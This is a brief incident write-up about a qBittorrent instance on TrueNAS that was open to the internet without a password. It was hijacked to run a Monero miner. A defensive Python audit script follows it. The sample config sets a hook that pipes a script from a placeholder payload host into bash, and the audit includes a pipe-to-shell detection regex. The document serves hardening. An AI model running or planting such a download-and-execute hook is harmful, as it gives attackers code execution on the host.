I got infected with a crypto-miner via misconfigured qBittorrent
10 hours ago
- #Cryptojacking
- #Security Breach
- #Network Hardening
- Noticed persistently high CPU usage in the qBittorrent app on TrueNAS, which returned to normal after restarting.
- Investigated and found suspicious processes running a Monero crypto-miner from c3pool.com via the qBittorrent app.
- The breach occurred due to an open qBittorrent instance accessible from the internet without password protection.
- Attackers exploited qBittorrent's script feature to execute a malicious payload (curl | bash) when torrents were downloaded.
- Mitigated the issue by securing qBittorrent behind an OIDC proxy and reporting the offending IP to Linode/Akamai.
- Lessons learned include the need for network segmentation, VLANs, and stricter firewalling to prevent future incidents.
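As an added example (not from the post, and not qBittorrent's own code), a small audit that reads a qBittorrent.conf and flags the two conditions the incident hinged on: a WebUI reachable without authentication, and a run-on-completion hook that pipes a download into a shell. The key names, the sample configurations and the payload host are assumptions modelled on qBittorrent's INI layout.

```python
import configparser
import re
from typing import List

# Constructed sample reflecting the misconfiguration in the post (assumed key
# names): WebUI auth bypassed for every source address, and the "run external
# program on completion" hook pointing at a curl-piped-to-bash payload.
WEAK_CONF = """\
[AutoRun]
enabled=true
program=curl -s http://<payload-host-placeholder>/x.sh | bash

[Preferences]
WebUI\\Address=*
WebUI\\LocalHostAuth=false
WebUI\\AuthSubnetWhitelistEnabled=true
WebUI\\AuthSubnetWhitelist=0.0.0.0/0
"""

# Constructed hardened counterpart: bound to loopback only (for a proxy in
# front), auth required everywhere, no completion hook.
HARDENED_CONF = """\
[AutoRun]
enabled=false

[Preferences]
WebUI\\Address=127.0.0.1
WebUI\\LocalHostAuth=true
WebUI\\AuthSubnetWhitelistEnabled=false
"""

# A download tool piped into a shell is a download-and-execute hook, not post-processing.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def audit_qbittorrent_conf(text: str) -> List[str]:
    """Return findings for the risky settings described in the post."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep key case, e.g. WebUI\Address
    cfg.read_string(text)
    findings: List[str] = []
    prefs = cfg["Preferences"] if cfg.has_section("Preferences") else {}
    if prefs.get("WebUI\\Address", "*") in ("*", "0.0.0.0", "::"):  # "*" is the default
        findings.append("WebUI listens on all interfaces")
    if prefs.get("WebUI\\LocalHostAuth", "true").lower() == "false":
        findings.append("WebUI auth disabled for localhost (proxied traffic looks local)")
    if prefs.get("WebUI\\AuthSubnetWhitelistEnabled", "false").lower() == "true":
        if any(s in prefs.get("WebUI\\AuthSubnetWhitelist", "") for s in ("0.0.0.0/0", "::/0")):
            findings.append("WebUI auth bypassed for every source address")
    if cfg.has_section("AutoRun") and cfg["AutoRun"].get("enabled", "false").lower() == "true":
        program = cfg["AutoRun"].get("program", "")
        findings.append(f"run-on-completion hook enabled: {program!r}")
        if PIPE_TO_SHELL.search(program):
            findings.append("hook downloads and pipes a remote script into a shell")
    return findings
```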